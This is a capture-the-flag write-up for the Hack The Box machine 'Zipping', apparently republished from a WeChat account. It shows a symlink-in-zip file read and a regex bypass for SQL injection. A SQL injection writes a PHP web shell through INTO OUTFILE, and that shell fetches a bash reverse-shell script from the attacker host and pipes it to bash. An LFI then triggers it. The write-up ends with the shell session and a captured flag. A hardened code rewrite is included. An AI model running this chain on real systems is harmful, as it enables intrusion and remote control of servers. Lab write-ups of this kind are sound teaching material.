First generate the malicious "pdf" (a symlink packed into the zip), upload it, then capture the request in Burp Suite to pull out the contents of product.php:
ln -s /var/www/html/shop/product.php lol.pdf
zip --symlink lol.zip lol.pdf
product.php source code:
    // Check to make sure the id parameter is specified in the URL
    if (isset($_GET['id'])) {
        $id = $_GET['id'];
        // Filtering user input for letters or special characters
        // (deny-list regex; the '"' and '/' inside the class are escaped so the pattern parses)
        if (preg_match("/^.*[A-Za-z!#$%^&*()-_=+{}[]\|;:'\",.<>\/?]|[^0-9]$/", $id, $match)) {
            header('Location: index.php');
        } else {
            // Prepare statement and execute, but does not prevent SQL injection
            // ($id is interpolated into the query string instead of being bound)
            $stmt = $pdo->prepare("SELECT * FROM products WHERE id = '$id'");
            $stmt->execute();
            // Fetch the product from the database and return the result as an Array
            $product = $stmt->fetch(PDO::FETCH_ASSOC);
            // Check if the product exists (array is not empty)
            if (!$product) {
                // Simple error to display if the id for the product doesn't exist (array is empty)
                exit('Product does not exist!');
            }
        }
    } else {
        // Simple error to display if the id wasn't specified
        exit('No ID provided!');
    }
    <?=template_header('Zipping | Product')?>
    <div class="product content-wrapper">
        <img src="assets/imgs/<?=$product['img']?>" width="500" height="500" alt="<?=$product['name']?>">
        <div>
            <h1 class="name"><?=$product['name']?></h1>
            <span class="price">
                $<?=$product['price']?>
                <?php if ($product['rrp'] > 0): ?>
                <span class="rrp">$<?=$product['rrp']?></span>
                <?php endif; ?>
            </span>
            <form action="index.php?page=cart" method="post">
                <input type="number" name="quantity" value="1" min="1" max="<?=$product['quantity']?>" placeholder="Quantity" required>
                <input type="hidden" name="product_id" value="<?=$product['id']?>">
                <input type="submit" value="Add To Cart">
            </form>
            <div class="description">
                <?=$product['desc']?>
            </div>
        </div>
    </div>
    <?=template_footer()?>
The comment in the code already says the SQL statement is vulnerable to SQL injection. The regex check can be bypassed with a newline: the first alternative, /^.*[A-Za-z!#$%^&*()-_=+{}[]\|;:'\",.<>\/?]/, only inspects the first line, because "." does not match a newline (so a leading newline, %0A, defeats it), and the second alternative, [^0-9]$, only checks whether the payload ends with a digit (so appending the comment "#1", i.e. %231, defeats it).
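For comparison, here is a hardened rewrite of the id handling in product.php. This is an added example, not the box's code; it assumes $pdo is an existing PDO connection, as in the original file, and replaces the deny-list regex with integer validation and a bound parameter.

```php
<?php
// Added example: hardened id handling for product.php (not the box's code).
// Assumes $pdo is an existing PDO connection, as in the original file.

// Validate with an allow-list instead of the deny-list regex. FILTER_VALIDATE_INT
// returns the integer only when the whole value is an integer (surrounding
// whitespace is trimmed), so "\n';select ... into outfile ... #1" is refused.
// null means the parameter is absent, false means it failed validation.
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT, [
    'options' => ['min_range' => 1],
]);
if ($id === null) {
    exit('No ID provided!');
}
if ($id === false) {
    header('Location: index.php');
    exit;
}

// Bind the value rather than interpolating it into the SQL string. The
// database receives the statement and the parameter separately, so no
// attacker-controlled text can change the query's structure.
$stmt = $pdo->prepare('SELECT * FROM products WHERE id = :id');
$stmt->bindValue(':id', $id, PDO::PARAM_INT);
$stmt->execute();
$product = $stmt->fetch(PDO::FETCH_ASSOC);
if (!$product) {
    exit('Product does not exist!');
}

// Escape every field before it is echoed into the template; the original
// prints $product['name'], $product['desc'] and friends unescaped.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}
?>
<h1 class="name"><?= e($product['name']) ?></h1>
<div class="description"><?= e($product['desc']) ?></div>
```

Independently of the code fix, the INTO OUTFILE write used below only works because the application's database account holds the FILE privilege and secure_file_priv is not restricted; dropping FILE from that account and setting secure_file_priv closes the file-write path even if an injection remains.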
Write a file and execute it via LFI: first generate a shell script, then start a Python HTTP server and a listener and wait for the reverse shell to call back.
echo "bash -c 'bash -i >& /dev/tcp/10.10.14.22/4444 0>&1'" > rev.sh
python3 -m http.server 80
nc -lvnp 4444
curl -s $'http://zipping.htb/shop/index.php?page=product&id=%0A'%3bselect+'<%3fphp+system("curl+http%3a//10.10.14.22/rev.sh|bash")%3b%3f>'+into+outfile+'/var/lib/mysql/breached.php'+%231'
curl -s $'http://zipping.htb/shop/index.php?page=..%2f..%2f..%2f..%2f..%2fvar%2flib%2fmysql%2fbreached'
Successfully got the user flag: c41c61d3d2252776ca84fd7d1a29b466
# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.11.229] 36748
bash: cannot set terminal process group (1125): Inappropriate ioctl for device
bash: no job control in this shell
rektsu@zipping:/var/www/html/shop$ id
id
uid=1001(rektsu) gid=1001(rektsu) groups=1001(rektsu)
rektsu@zipping:/var/www/html/shop$ data
data
bash: data: command not found
rektsu@zipping:/var/www/html/shop$ time
time
real 0m0.000s
user 0m0.000s
sys 0m0.000s
rektsu@zipping:/var/www/html/shop$ data
data
bash: data: command not found
rektsu@zipping:/var/www/html/shop$ cat /home/rektsu/user.txt
cat /home/rektsu/user.txt
c41c61d3d2252776ca84fd7d1a29b466
rektsu@zipping:/var/www/html/shop$
Originally published on the WeChat official account (hades zorejt): HTB-Zipping notes - new way to get a shell